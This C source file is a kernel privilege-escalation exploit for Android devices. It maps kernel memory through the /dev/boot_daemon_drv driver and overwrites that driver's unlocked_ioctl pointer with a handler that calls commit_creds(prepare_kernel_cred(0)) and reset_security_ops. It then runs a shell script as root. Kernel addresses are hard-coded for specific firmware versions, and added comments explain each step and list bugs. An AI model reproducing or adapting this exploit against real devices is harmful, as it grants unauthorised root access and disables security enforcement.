- #include <stdio.h>
- #include <stdint.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <fcntl.h>
- #include <errno.h>
- #include <sys/stat.h>
- #include <fcntl.h>
- #include <sys/mman.h>
- #include <sys/ioctl.h>
- #include "kexec.h"
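/*
 * Print a hex + ASCII dump of num bytes starting at addr to stdout, 16
 * bytes per line, in the usual "address : xx xx ... |text" layout.
 *
 * Only the first num bytes are read: a final partial line is padded with
 * blanks so the ASCII column stays aligned, instead of rounding num up to
 * a whole line and reading past the caller's buffer. Bytes are handled as
 * unsigned char so values >= 0x80 print as two hex digits rather than a
 * sign-extended int, and the address is printed as an integer (passing a
 * pointer through %x is undefined behaviour).
 *
 * addr: start of the region; must point to at least num readable bytes.
 * num:  number of bytes to dump. NULL addr, zero or negative num print nothing.
 */
void memdump(char* addr, int num)
{
    if (addr == NULL || num <= 0) {
        return;
    }

    const unsigned char *p = (const unsigned char *)addr;
    size_t remaining = (size_t)num;

    while (remaining > 0) {
        size_t line_len = remaining < 16 ? remaining : 16;

        printf("%08lx : ", (unsigned long)(uintptr_t)p);

        for (size_t i = 0; i < 16; i++) {
            if (i < line_len) {
                printf("%02x ", p[i]);
            } else {
                printf("   ");  /* blank cell for a short last line */
            }
        }

        for (size_t i = 0; i < line_len; i++) {
            /* printable 7-bit ASCII only; everything else becomes '.' */
            if (p[i] >= 0x20 && p[i] < 0x80) {
                printf("%c", p[i]);
            } else {
                printf(".");
            }
        }
        printf("\n");

        p += line_len;
        remaining -= line_len;
    }
}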
/* Set to 1 inside getroot_ioctl() and read back by callback() after the
 * ioctl, to confirm the handler was actually reached. volatile because the
 * write presumably happens in another context once the handler is installed
 * (inferred from how patch_mem uses it, not verified here). */
volatile int iscalled = 0;

/* Address of the kernel's kallsyms_lookup_name, filled in by main() from a
 * per-firmware-version constant. Left NULL for an unknown version, in which
 * case getroot_ioctl() does nothing. */
unsigned long (*kallsyms_lookup_name)(const char *name) = (void*)0;
/*
 * Handler whose address patch_mem() writes into the function-pointer slot it
 * labels "unlocked_ioctl" in the mapped kernel data. Its (fd, cmd, arg)
 * signature is shaped like a file_operations ->unlocked_ioctl; that it runs
 * in kernel context is inferred from how it is installed, not shown here.
 *
 * Resolves commit_creds, prepare_kernel_cred and reset_security_ops via the
 * kallsyms_lookup_name pointer set by main(). When the first two resolve it
 * replaces the caller's credentials with freshly prepared kernel ones; when
 * reset_security_ops resolves it is called too (presumably to restore the
 * default LSM ops — not verified here). Finally records that it ran in
 * `iscalled`. Always returns 0.
 *
 * Review note: the correctness of everything below rests on main() having
 * picked the right kallsyms_lookup_name address for the running kernel; a
 * wrong value means calling an arbitrary kernel location.
 */
long getroot_ioctl(unsigned int fd, unsigned int cmd, unsigned long arg)
{
    /* Unknown kernel (main() had no address for it): do nothing. */
    if(kallsyms_lookup_name == 0) return 0;
    int(*commit_creds)(void*) = (void*)kallsyms_lookup_name("commit_creds");
    void*(*prepare_kernel_cred)(void*) = (void*)kallsyms_lookup_name("prepare_kernel_cred");
    void (*reset_security_ops)(void) = (void*)kallsyms_lookup_name("reset_security_ops");
    /* Both symbols are needed; a lookup returning 0 skips the whole step. */
    if(commit_creds != 0 && prepare_kernel_cred != 0){
        commit_creds(prepare_kernel_cred(0));
    }
    if(reset_security_ops != 0){
        reset_security_ops();
    }
    iscalled = 1;
    return 0;
}
- // goroh_kun wrote:
- //
- // (1)ダンプしたテキスト内で以下の文字列を探します
- //
- // deadline
- //
- // ※その0x70ぐらい上にnoopが見える箇所です。
- //
- // (2)その0x400ぐらい下に以下のバイトパターンが存在する
- // 24 01 00 00 xx xx xx c0 00 00 00 00 xx xx xx c0 00 00 00 00
- // 24 01 00 00 xx xx xx c0 00 00 00 00 xx xx xx c0 00 00 00 00
- // 24 01 00 00 xx xx xx c0 00 00 00 00 00 00 00 00 00 00 00 00
- //
- // (3)その次の xx xx xx c0がshboot_daemon_readのアドレスです。
- // (4)(3)の次のxx xx xx c0がshboot_daemon_writeのアドレスです。
- // (5)次しばらく0が続いて、次のxx xx xx c0がshboot_daemon_mmap,shboot_daemon_open
- // (6)shboot_daemon_mmapの一個前の00 00 00 00がcompat_ioctl,その一個前の00 00 00 00が
- // unlocked_ioctl関数のポインタになります。
- //
- // このunlocked_ioctlのデータにパッチを当てるのが良いと思います。
- // 既に/dev/boot_daemon_drvはopen済みですし。
- //
- // オススメは、shbootgetrootプログラム内にroot取得関数をおいておき、
- // その関数のアドレスを書いてしまうのが良いと思います。
- //
- // そうすれば、/dev/boot_daemon_drvのfdに対してioctlした段階で、root取得関数が
- // 呼ばれるようになります。
- //
/*
 * Scan the mapped kernel data for the byte pattern of the driver's
 * file_operations table (the per-field comments inside the condition name
 * which slot each byte range is taken to be) and overwrite the 4 bytes at
 * offset 68..71 — the slot commented as unlocked_ioctl — with the address
 * of getroot_ioctl.
 *
 * mem:    start of the writable mapping of the target region.
 * length: size of that mapping in bytes.
 * Returns the address of the patched 4-byte slot, or (unsigned long)-1
 * when no match was found. The scan advances 4 bytes at a time and stops
 * 136 bytes before the end so that addr[0..135] stays inside the mapping.
 *
 * Review notes (code left as-is):
 *  - The comparisons `addr[..] == 0xc0` only ever match when plain char is
 *    unsigned (the ARM ABI default); on a signed-char target 0xc0 reads as
 *    -64 and the pattern never matches.
 *  - `length - 136` is unsigned: a mapping shorter than 136 bytes wraps the
 *    bound and the loop walks off the mapping.
 *  - The printf calls pass pointers through %08x, which is undefined
 *    behaviour; %p (or a cast to unsigned long with %lx) is the portable form.
 *  - The `return -1` converts to ULONG_MAX; callback() compares against -1
 *    with the same conversion, so the two agree.
 */
unsigned long patch_mem(unsigned int* mem, unsigned long length)
{
    char* addr = (char*)mem;
    while(addr < (char*)mem + length - 136) {
        if (
/*
addr[ 0] == 0x24 && addr[ 1] == 0x01 && addr[ 2] == 0x00 && addr[ 3] == 0x00 &&
addr[ 7] == 0xc0 &&
addr[ 8] == 0x00 && addr[ 9] == 0x00 && addr[ 10] == 0x00 && addr[ 11] == 0x00 &&
addr[ 15] == 0xc0 &&
addr[ 16] == 0x00 && addr[ 17] == 0x00 && addr[ 18] == 0x00 && addr[ 19] == 0x00 &&
addr[ 20] == 0x24 && addr[ 21] == 0x01 && addr[ 22] == 0x00 && addr[ 23] == 0x00 &&
addr[ 27] == 0xc0 &&
addr[ 28] == 0x00 && addr[ 29] == 0x00 && addr[ 30] == 0x00 && addr[ 31] == 0x00 &&
addr[ 35] == 0xc0 &&
addr[ 36] == 0x00 && addr[ 37] == 0x00 && addr[ 38] == 0x00 && addr[ 39] == 0x00 &&
addr[ 20] == 0x24 && addr[ 21] == 0x01 && addr[ 22] == 0x00 && addr[ 23] == 0x00 &&
addr[ 27] == 0xc0 &&
addr[ 28] == 0x00 && addr[ 29] == 0x00 && addr[ 30] == 0x00 && addr[ 31] == 0x00 &&
*/
            /* Zero slots are fields the table is expected to leave unset;
             * the 0xc0 checks only test the top byte of a kernel-space
             * pointer (the offsets in the comments are relative to read). */
            addr[ 32] == 0x00 && addr[ 33] == 0x00 && addr[ 34] == 0x00 && addr[ 35] == 0x00 && //(owner)
            addr[ 36] == 0x00 && addr[ 37] == 0x00 && addr[ 38] == 0x00 && addr[ 39] == 0x00 && //(llseek)
            addr[ 43] == 0xc0 && //shboot_daemon_read
            addr[ 47] == 0xc0 && //shboot_daemon_write (-0xc8)
            addr[ 48] == 0x00 && addr[ 49] == 0x00 && addr[ 50] == 0x00 && addr[ 51] == 0x00 && //(aio_read)
            addr[ 52] == 0x00 && addr[ 53] == 0x00 && addr[ 54] == 0x00 && addr[ 55] == 0x00 && //(aio_write)
            addr[ 56] == 0x00 && addr[ 57] == 0x00 && addr[ 58] == 0x00 && addr[ 59] == 0x00 && //(readdir)
            addr[ 60] == 0x00 && addr[ 61] == 0x00 && addr[ 62] == 0x00 && addr[ 63] == 0x00 && //(poll)
            addr[ 64] == 0x00 && addr[ 65] == 0x00 && addr[ 66] == 0x00 && addr[ 67] == 0x00 && //(ioctl)
            addr[ 68] == 0x00 && addr[ 69] == 0x00 && addr[ 70] == 0x00 && addr[ 71] == 0x00 && //(unlocked_ioctl)
            addr[ 72] == 0x00 && addr[ 73] == 0x00 && addr[ 74] == 0x00 && addr[ 75] == 0x00 && //(compat_ioctl)
            addr[ 79] == 0xc0 && //shboot_daemon_mmap (-0x120)
            addr[ 83] == 0xc0 && //shboot_daemon_open (-0x164)
            addr[ 84] == 0x00 && addr[ 85] == 0x00 && addr[ 86] == 0x00 && addr[ 87] == 0x00 && //(flush)
            addr[ 91] == 0xc0 && //shboot_daemon_release (-0x140)
            addr[ 92] == 0x00 && addr[ 93] == 0x00 && addr[ 94] == 0x00 && addr[ 95] == 0x00 && //(fsync)
            addr[ 96] == 0x00 && addr[ 97] == 0x00 && addr[ 98] == 0x00 && addr[ 99] == 0x00 && //(aio_fsync)
            addr[100] == 0x00 && addr[101] == 0x00 && addr[102] == 0x00 && addr[103] == 0x00 && //(fasync)
            addr[104] == 0x00 && addr[105] == 0x00 && addr[106] == 0x00 && addr[107] == 0x00 && //(lock)
            addr[108] == 0x00 && addr[109] == 0x00 && addr[110] == 0x00 && addr[111] == 0x00 && //(sendpage)
            addr[112] == 0x00 && addr[113] == 0x00 && addr[114] == 0x00 && addr[115] == 0x00 && //(get_unmapped_area)
            addr[116] == 0x00 && addr[117] == 0x00 && addr[118] == 0x00 && addr[119] == 0x00 && //(check_flags)
            addr[120] == 0x00 && addr[121] == 0x00 && addr[122] == 0x00 && addr[123] == 0x00 && //(flock)
            addr[124] == 0x00 && addr[125] == 0x00 && addr[126] == 0x00 && addr[127] == 0x00 && //(splice_write)
            addr[128] == 0x00 && addr[129] == 0x00 && addr[130] == 0x00 && addr[131] == 0x00 && //(splice_read)
            addr[132] == 0x00 && addr[133] == 0x00 && addr[134] == 0x00 && addr[135] == 0x00 //(setlease)
        ) {
            printf("addr=%08x\n", addr);
            fflush(stdout);
            /* Reassemble the little-endian 32-bit pointers for diagnostics only;
             * they are not dereferenced here. */
            unsigned long *p_read = (unsigned long*)(addr[40] + (addr[41]<<8) + (addr[42]<<16) + (addr[43]<<24));
            unsigned long *p_write = (unsigned long*)(addr[44] + (addr[45]<<8) + (addr[46]<<16) + (addr[47]<<24));
            unsigned long *p_mmap = (unsigned long*)(addr[76] + (addr[77]<<8) + (addr[78]<<16) + (addr[79]<<24));
            unsigned long *p_open = (unsigned long*)(addr[80] + (addr[81]<<8) + (addr[82]<<16) + (addr[83]<<24));
            unsigned long *p_release = (unsigned long*)(addr[88] + (addr[89]<<8) + (addr[90]<<16) + (addr[91]<<24));
            printf("read=%08x\n", p_read);
            printf("write=%08x\n", p_write);
            printf("mmap=%08x\n", p_mmap);
            printf("open=%08x\n", p_open);
            printf("release=%08x\n", p_release);
            fflush(stdout);
            /* Optional stricter match on the relative distances between the
             * recovered pointers; disabled by default (define the macro to
             * enable). Note the subtractions are in unsigned long units, not
             * bytes, so the constants only make sense if that was intended. */
//#define GETROOT_NEED_CHECK_ADDRESS_OFFSET
#ifdef GETROOT_NEED_CHECK_ADDRESS_OFFSET
            if (p_read - p_write == 0xc8 && p_read - p_mmap == 0x120 &&
                p_read - p_open == 0x164 && p_release - p_open == 0x140) {
#endif
                printf("found at %08x\n", (addr));
                fflush(stdout);
                memdump((char*)(addr+32), 0x68);
                fflush(stdout);
                /* Write the handler address little-endian into the slot. */
                addr[68] = (unsigned long)&getroot_ioctl & 0xff;
                addr[69] = ((unsigned long)&getroot_ioctl>>8) & 0xff;
                addr[70] = ((unsigned long)&getroot_ioctl>>16) & 0xff;
                addr[71] = ((unsigned long)&getroot_ioctl>>24) & 0xff;
                return (unsigned long)(addr + 68);
#ifdef GETROOT_NEED_CHECK_ADDRESS_OFFSET
            }
#endif
            printf("\n");
        }
        addr += 4;
    }
    return -1;
}
/*
 * Per-region callback handed to kexec_iomem_for_each_line() by main().
 * The signature (data, nr, str, base, length) is dictated by kexec.h, which
 * is not visible here; only targetbase/targetlength are used.
 *
 * Opens /dev/boot_daemon_drv, maps targetbase..targetbase+targetlength
 * read/write and shared at fixed user address 0x10000000, and hands the
 * mapping to patch_mem(). If a slot was patched it unmaps, issues one
 * ioctl on the device to reach the patched handler, re-maps, zeroes the
 * four patched bytes again, closes the device and execve()s
 * /system/bin/sh with /data/local/autoexec.sh. Otherwise it unmaps,
 * closes and returns 0 (continue iterating).
 *
 * Defensive note: the whole primitive is a character device that lets an
 * unprivileged caller create a writable MAP_SHARED mapping of kernel data.
 * The fix belongs in the driver / device permissions, not in user space.
 *
 * Review notes (code left as-is):
 *  - strerror() needs <string.h> and `environ` needs
 *    `extern char **environ;`; neither is declared in the visible includes,
 *    so both are implicit declarations.
 *  - open() of /proc/self/maps and the following read() are unchecked; on
 *    failure a negative ret is passed to write() as a size. The dump is also
 *    written to fd 0 (stdin) rather than stdout.
 *  - targetbase (unsigned long) is printed with %08x; on LP64 that is a
 *    format/argument mismatch. Pointers are likewise printed through %08x.
 *  - The `return -1` after execve() is only reached if execve() fails.
 */
int callback(void *data, int nr, char *str, unsigned long targetbase, unsigned long targetlength)
{
    unsigned long addr;
    int fd = open("/dev/boot_daemon_drv", O_RDWR);
    printf("mmap base=%08x length=%08x\n", targetbase, targetlength);
    if(fd < 0){
        printf("open failed \"%s\"(%d)\n", strerror(errno), errno);
        return 0;
    }
    /* Fixed user-space address for the mapping; MAP_FIXED below will
     * silently replace anything already mapped there. */
    addr = 0x10000000;
    unsigned int *mem = (unsigned int*)mmap(
        (void*)addr, targetlength, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED, fd, targetbase);
    if(mem == MAP_FAILED)
    {
        printf("mmap error %08X \"%s\"(%d)\n", targetbase, strerror(errno), errno);
    } else {
        /* Diagnostic: echo our own memory map so the new mapping is visible. */
        char buf[0x4000];
        int fdmap = open("/proc/self/maps", O_RDONLY);
        int ret = read(fdmap, buf, sizeof(buf));
        write(0, buf, ret);
        fflush(stdout);
        close(fdmap);
        printf("mem=%08x\n", mem);
        fflush(stdout);
        unsigned long patch = patch_mem(mem, targetlength);
        /* patch_mem returns (unsigned long)-1 on no match; same conversion here. */
        if (patch != -1) {
            if (munmap(mem, targetlength)) {
                printf("munmap error \"%s\"(%d)\n", strerror(errno), errno);
            } else {
                printf("munmaped\n");
            }
            fflush(stdout);
            usleep(100000);
            /* Any ioctl on the device now goes through the patched slot. */
            ioctl(fd, 0, 0);
            printf("iscalled=%d\n", iscalled);
            usleep(100000);
            /* Map again to undo the patch: restore the slot to its original
             * zero bytes (the pattern match required them to be zero). */
            mem = (unsigned int*)mmap(
                (void*)addr, targetlength, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED, fd, targetbase);
            if(mem == MAP_FAILED) {
                printf("re-mmap error %08X \"%s\"(%d)\n", targetbase, strerror(errno), errno);
            } else {
                printf("remmaped\n");
                char* a = (char*) patch;
                memdump((char*)(a-36), 0x68);
                printf("\n");
                a[0] =0;
                a[1] =0;
                a[2] =0;
                a[3] =0;
                printf("re-patched\n");
                memdump((char*)(a-36), 0x68);
                printf("\n");
            }
            close(fd);
            // execl("/system/bin/sh", "/system/bin/sh", "-i", NULL);
            {
                char *par[10];
                par[0] = "/system/bin/sh";
                par[1] = "/data/local/autoexec.sh";
                par[2] = (char*)0;
                execve(par[0],par, environ);
            }
            return -1;
        }
        if (munmap(mem, targetlength)) {
            printf("munmap error \"%s\"(%d)\n", strerror(errno), errno);
        }
        if (close(fd)) {
            printf("close error \"%s\"(%d)\n", strerror(errno), errno);
        }
        return 0;
    }
    close(fd);
    return 0;
}
/*
 * Entry point. argv[1] selects a firmware version, which picks the
 * hard-coded kernel address of kallsyms_lookup_name for that build; the
 * version-to-address table is the only thing tying this program to a
 * specific kernel image. Then every "Kernel data" line found by
 * kexec_iomem_for_each_line() (from kexec.h, not visible here; presumably
 * it walks /proc/iomem) is passed to callback().
 *
 * Returns -1 without an argument, otherwise 0 once the iteration ends.
 *
 * Review notes (code left as-is):
 *  - atoi() is unchecked; any value other than 0..2 (including garbage,
 *    which atoi turns into 0 only when it parses nothing) leaves
 *    kallsyms_lookup_name NULL, and getroot_ioctl() then becomes a no-op
 *    while the memory patch still happens.
 *  - There is no default case, so an unlisted version is silently accepted.
 */
int main(int argc, char** argv)
{
    if(argc < 2) return -1;
    switch(atoi(argv[1])){
        case 0: // 01.00.01
            kallsyms_lookup_name = (void*)0xc00be3b4;
            break;
        case 1: // 01.00.03
        case 2: // 01.00.04
            kallsyms_lookup_name = (void*)0xc00bf784;
            break;
    }
    kexec_iomem_for_each_line("Kernel data", callback, 0);
    return 0;
}